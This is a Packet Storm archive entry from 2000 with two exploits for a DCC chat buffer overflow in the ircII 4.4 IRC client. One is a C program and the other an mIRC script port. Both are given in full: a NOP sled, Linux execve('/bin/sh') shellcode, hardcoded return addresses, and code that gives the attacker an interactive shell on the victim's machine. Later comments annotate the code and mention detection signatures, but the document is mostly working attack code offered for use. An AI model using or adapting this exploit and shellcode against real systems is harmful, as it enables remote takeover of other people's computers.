ircii_exploit.txt

2000-04-20T00:00:00
ID PACKETSTORM:10047
Type packetstorm
Reporter Bladi
Modified 2000-04-20T00:00:00

Description

                                        
The following exploits target a DCC chat buffer overflow in ircII 4.4: one is for  
Linux and the other one is for mIRC.  
  
  
-- start irciisploit.txt --  
  
/*  
  
ircii-4.4 exploit by bladi & aLmUDeNa  
  
buffer overflow in ircii dcc chats  
allows execution of arbitrary code  
  
Affected:  
ircII-4.4  
  
Patch:  
Upgrade to ircII-4.4M  
ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz  
  
Offset:  
SuSe 6.x :0xbfffe3ff  
RedHat :0xbfffe888  
  
Thanks to : #warinhell,#hacker_novatos  
Special thanks go to: Topo[lb],  
Saludos para todos los que nos conozcan especialmente para eva ;)  
(bladi@euskalnet.net)  
*/  
  
#include <stdio.h>  
#include <netdb.h>  
#include <string.h>  
#include <signal.h>  
#include <unistd.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
  
char *h_to_ip(char *hostname);
/*
 * Resolve hostname to a dotted-quad string with gethostbyname().
 * Returns inet_ntoa()'s static buffer (overwritten by the next call);
 * on lookup failure prints a Spanish "incorrect IP" message and exits
 * the whole process with status 0. The caller feeds the result straight
 * back into inet_addr(), so the round trip through text is redundant.
 * <arpa/inet.h> (inet_ntoa) and <stdlib.h> (exit) are not in the
 * include list above, so those calls may rely on implicit declarations.
 */
char *h_to_ip(char *hostname) {
struct hostent *hozt;
struct sockaddr_in tmp;
struct in_addr in;
if ((hozt=gethostbyname(hostname))==NULL)
{
printf(" ERROR: IP incorrecta\n");
exit(0);
}
/* Copies h_length bytes into the 4-byte s_addr; assumes an IPv4 answer (h_length == 4). */
memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
memcpy(&in,&tmp.sin_addr.s_addr,4);
return(inet_ntoa(in));
}
/*
 * Historical (2000) proof-of-concept against the ircII 4.4 DCC CHAT
 * buffer overflow, fixed in ircII-4.4M (see header). Connects to the
 * victim client's DCC CHAT listener and streams a fixed payload in
 * three stages: 47 x 16 bytes of 0x90, the shellcode, then a repeated
 * 4-byte address. Kept as published; the wire pattern (a long 0x90 run
 * followed by the bytes below) is what a detection signature for this
 * traffic would match on.
 *
 * argv[1] = hostname, argv[2] = TCP port.
 * Implicit-int main with no return statement is pre-C99 style.
 */
main(int argc, char *argv[])
{
struct sockaddr_in sin;
char *hostname;
/* 16 bytes of 0x90 (x86 NOP); written 47 times below as the sled. */
char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
/* Payload ending in the text "/bin/sh" with two \xcd\x80 (int 0x80)
 * sequences; appears to be the classic Linux x86 execve("/bin/sh")
 * shellcode. It contains no NUL byte, so strlen() below yields its
 * full length. */
char *shell =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int outsocket,tnt,i; /* tnt is never used. */
printf (" irciismash ver: 1.0\n");
printf (" by \n");
printf (" bladi & aLmUDeNa\n\n");

if (argc<3)
{
printf("Usage : %s hostname port\n",argv[0]);
exit(-1);
}
hostname=argv[1];
/* socket() result is not checked; a failure surfaces only at connect(). */
outsocket=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
/* atoi() returns 0 for a non-numeric port with no error indication. */
sin.sin_port=htons(atoi(argv[2]));
sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
printf(" ERROR: El puerto esta cerradito :_(\n"); /* "the port is closed" */
exit(0);
}
/* Stage 1: 47 writes of the 16-byte block, 752 bytes of 0x90 in total.
 * write() return values are ignored throughout this function. */
printf("[1]- Noping\n [");
for(i=0;i<47;i++)
{
/* Progress dot every 7th iteration; the usleep(9) is cosmetic. */
if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
write(outsocket,nops,strlen(nops));
}
printf("]\n");
printf(" Noped\n");
printf("[2]- Injectin shellcode\n");
/* Stage 2: the shellcode itself, as one write. */
write(outsocket,shell,strlen(shell));
usleep(999);
printf(" Injected\n");
printf("[3]- Waiting\n [");
/* Stage 3: 299 repetitions of the byte sequence ff bf ff e3 -- the
 * bytes of the SuSE 6.x address 0xbfffe3ff from the header, byte-rotated
 * and repeated so any 4-byte alignment yields that address. The RedHat
 * address listed in the header is not used by this code. The strlen()
 * arguments do not match the bytes written ("\xe9" vs "\xff") but all
 * evaluate to 1. */
for(i=0;i<299;i++)
{
printf(".");
fflush(stdout);
usleep(99);
write(outsocket,"\xff",strlen("\xff"));
write(outsocket,"\xbf",strlen("\xff"));
write(outsocket,"\xff",strlen("\xe9"));
write(outsocket,"\xe3",strlen("\xff"));
}
printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
close(outsocket);
}
  
-- end irciisploit.txt --  
-- start ide_expl.mrc --  
  
# Written directly from irciisploit.txt (a .c program for *nix), which someone gave me to port to mIRC.  
#  
# Exploit to overflow a buffer and run a shell. More often than not, however, it will crash/segfault  
# with both versions of this exploit by default. (The exploit is noted as being for v4.4 and patched in  
# v4.4M.)  
#  
# irciisploit.txt by: bladi & aLmUDeNa  
# irciisploit.mrc(this) by: _v9(vade79)  
#  
# Also included in the exploit(irciisploit.txt) were some other offsets:  
#  
# "SuSe 6.x :0xbfffe3ff"  
# "RedHat :0xbfffe888"  
#  
# To load this script into mIRC5.7: /load -rs <path/to/file.mrc>  
#  
# NOTE: While making this I noticed /sockwrite had some problems keeping up with checking whether  
# the connection still exists, so if you see a /sockwrite error in the status window, the user  
# probably segfaulted.  
  
; Convert a two-character lower-case hex string to its decimal value,
; for use with /bset. Returns nothing if $1 is not exactly 2 characters.
; Non-digit characters are mapped with $asc - 87, which is correct only
; for lower-case a-f (97-102 -> 10-15); upper-case A-F would go negative.
alias -l bin {
if ($len($1) != 2) { return }
var %i, %j, %k
; NOTE(review): the two $calc(...) calls below carry one extra closing paren as published.
if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) }
else { %i = $left($1,1) }
if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) }
else { %j = $right($1,1) }
; High nibble contributes 16 per unit; the low nibble is added directly.
while (%i) { %k = %k + 16 | dec %i }
return $calc(%k + %j)
}
; Turn a "\xHH\xHH..." escape string into the space-separated decimal
; byte list that /bset expects: "\x" is collapsed to "\", the result is
; split on "\" (ASCII 92) and each token goes through $bin.
alias -l make_string {
var %i = 1, %j
while ($gettok($replace($1,\x,\),0,92) >= %i) {
%j = %j $bin($gettok($replace($1,\x,\),%i,92))
inc %i
}
return %j
}
; Name of the custom window used for all status output.
alias -l wn return @ircii4.4_dcc_exploit
; Guarded /sockwrite: $1- is passed through unchanged (socket name and
; data, optionally preceded by a -n switch), so at least two arguments
; are required. The liveness check is on the hard-coded socket exp_ide,
; not on $1: if it is no longer active the window is closed and the last
; %ide.status stage reported; otherwise the data is shown in the titlebar
; and written.
alias -l sw {
if ($2) {
if ($sock(exp_ide).status != active) {
if ($window($wn)) { window -c $wn }
echo -a Connection lost/non-existant. ( $+ %ide.status $+ )
}
else {
if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) }
sockwrite $1-
}
}
}
; Entry stage: (re)open the status window, remember the target nick, pick
; a random free port in 1024-4096, listen on it as exp_ide_base and send
; the nick a CTCP DCC CHAT offer pointing at $ip:%ide.port, so the target
; client connects back to this listener. The raw PRIVMSG is the initial
; contact a server-side or client-side log would show.
alias -l main {
if ($window($wn)) { window -c $wn } | window -aek $wn
echo $wn *** [01]: sending DCC chat request, waiting...
set %ide.nick $1 | set %ide.port $rand(1024,4096)
while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) }
sockclose exp_ide_base | socklisten exp_ide_base %ide.port
.quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1)
}
; Public command: /exploit_ircii <nick>. Does nothing unless connected to
; a server; refuses to run while the status window is open or on mIRC
; older than 5.7, otherwise hands the nick to the local main alias.
alias exploit_ircii {
if ($server) {
if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt }
elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt }
elseif ($1) { main $1 }
else { echo -a Syntax: /exploit_ircii <nick> }
}
}
; Echo every line received on the accepted DCC socket to the status
; window; empty lines are shown as "(no data)". Loops via goto until
; $sockbr reports nothing left to read, and bails on a socket error.
on 1:SOCKREAD:exp_ide: {
if ($sockerr > 0) return
:read
sockread %data
if ($sockbr == 0) return
if (%data == $null) var %data = (no data)
if ($window($wn)) { echo $wn -> %data }
goto read
}
; The target connected back: accept it as exp_ide and drop the listener.
; %ide.status counts the stages reached (0-4) and is echoed on disconnect.
; The payload mirrors the C version: 47 x the 16-byte 0x90 block, the
; shellcode with "/bin/sh" appended as text, then 299 rounds of the four
; bytes in &o sent one byte per sockwrite. The "while (%i < N) { inc %i }"
; loops are busy-wait delays rather than timers and presumably stall mIRC
; while they run. If the status window is gone the connection is closed.
on 1:SOCKLISTEN:exp_ide_base: {
sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base
unset %ide.status
if ($window($wn)) {
set %ide.status 0
echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc)
; $make_string yields the decimal byte list /bset expects.
bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90)
; Same four address bytes the C version writes (SuSE 6.x offset from the header, byte-rotated).
bset &o 1 $make_string(\xff\xbf\xff\xe3)
bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff)
; Appends "/bin/sh" as text immediately after the last shellcode byte.
bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh
echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc)
inc %ide.status
echo $wn *** [--]: * (1/4) sending the nops, looping 47 times.
var %i = 0
while (%i < 47) {
sw exp_ide &nops
inc %i
}
inc %ide.status
echo $wn *** [--]: * (2/4) sent, now sending the shell code.
sw exp_ide &shellcode
; Busy-wait delay before the address stage.
%i = 0 | while (%i < 9999) { inc %i }
inc %ide.status
echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times.
%i = 0
while (%i < 299) {
; Short busy-wait, then &o one byte at a time through the 1-byte &bit buffer.
var %j = 0 | while (%j < 499) { inc %j }
var %j = 1
while ($bvar(&o,%j)) {
bset &bit 1 $bvar(&o,%j)
sw exp_ide &bit
inc %j
}
inc %i
}
inc %ide.status
echo $wn *** [--]: * (4/4) sent, done.
}
else { sockclose exp_ide }
}
; Remote side closed the DCC socket: close the status window, report the
; nick and the last %ide.status stage reached, and clear all %ide.* state.
on 1:SOCKCLOSE:exp_ide: {
if ($window($wn)) { window -c $wn }
echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ )
unset %ide.*
}
; User closed the status window: tear down both sockets (listener and
; accepted connection) and clear all %ide.* state.
on 1:CLOSE:@: {
if ($target == $wn) {
if ($sock(exp_ide)) { sockclose exp_ide }
if ($sock(exp_ide_base)) { sockclose exp_ide_base }
unset %ide.*
}
}
; Text typed into the status window: once all 4 stages are done and the
; socket is active it is echoed and sent with "sw -n" (newline-terminated
; sockwrite); otherwise an error is shown. Input is always swallowed (halt).
on 1:INPUT:@: {
if ($active == $wn) {
if ($sock(exp_ide).status == active) {
if (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. }
else { echo $wn <- $1- | sw -n exp_ide $1- }
}
else { echo $wn *** Error, socket status isn't online yet. }
halt
}
}
; On /load: refuse and self-unload on mIRC older than 5.7, otherwise
; print the command syntax.
on 1:LOAD: {
if ($version < 5.7) { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt }
else { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii <nick>. }
}
  
-- end ide_expl.mrc --  
  